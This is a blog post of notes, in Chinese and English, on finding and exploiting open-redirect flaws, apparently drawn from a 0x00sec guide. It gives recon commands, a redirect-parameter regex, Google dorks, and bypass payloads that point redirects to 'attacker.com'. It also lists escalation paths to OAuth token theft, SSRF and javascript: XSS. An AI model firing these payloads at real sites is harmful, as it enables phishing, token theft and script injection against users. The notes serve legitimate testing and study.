• url跳转挖掘


    https://0x00sec.org/t/open-redirection-guide/21118

    工具都是go语言的,不太会用,留个坑

    Identifing possible vulnerable endpoints:

    • waybackurls 10 + hakrawler 9 + gf 11

      1cat subdomains | waybackurls | tee -a urls
      2cat subdomains | hakrawler -depth 3 -plain | tee -a urls
      3gf redirect urls

      using redirect.json with gf:

    {
        "flags" : "-HanrE",
        "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
    }
    
    • Google dorks
      site:domain.com inurl:[PARAMETER] using a parameter list 21
    • Manual inspection by navigating the webapp and intercepting the requests

    Confirm and exploit:

    * https://company.com/?redirect=http://attacker.com
    * https://company.com/?redirect=http://company.com.attacker.com
    * https://company.com/?redirect=https://company.com@attacker.com
    * https://company.com/?redirect=//attacker.com
    * https://company.com/?redirect=http://attacker.com#company.com
    * https://company.com/?redirect=http://attacker.com?company.com
    * https://company.com/?redirect=http://attacker.com/company.com
    * https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ
    
    Using special characters:
    ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
    ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
    ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
    ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
    Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
    ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
    ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ 。
    

    Special characters’ source 4

    Escalating to other vulnerabilities:

    Open Redirect + Miconfigured OAuth App => OAuth Token Stealing
    Open Redirect + Filtered SSRF => SSRF
    Open Redirect + CRLFi => XSS
    Open Redirect + javascript URI => XSS
    

    Source 4

    Escalate to XSS

    • https://company.com/?redirect=javascript:alert(1)
    • https://company.com/?redirect=javascript:prompt(1)

    Escalate to XSS using CRLFi

  • 相关阅读:
    hdu5728 PowMod
    CF1156E Special Segments of Permutation
    CF1182E Product Oriented Recurrence
    CF1082E Increasing Frequency
    CF623B Array GCD
    CF1168B Good Triple
    CF1175E Minimal Segment Cover
    php 正则
    windows 下安装composer
    windows apache "The requested operation has failed" 启动失败
  • 原文地址:https://www.cnblogs.com/ahacker15/p/13065571.html
Copyright © 2020-2023  润新知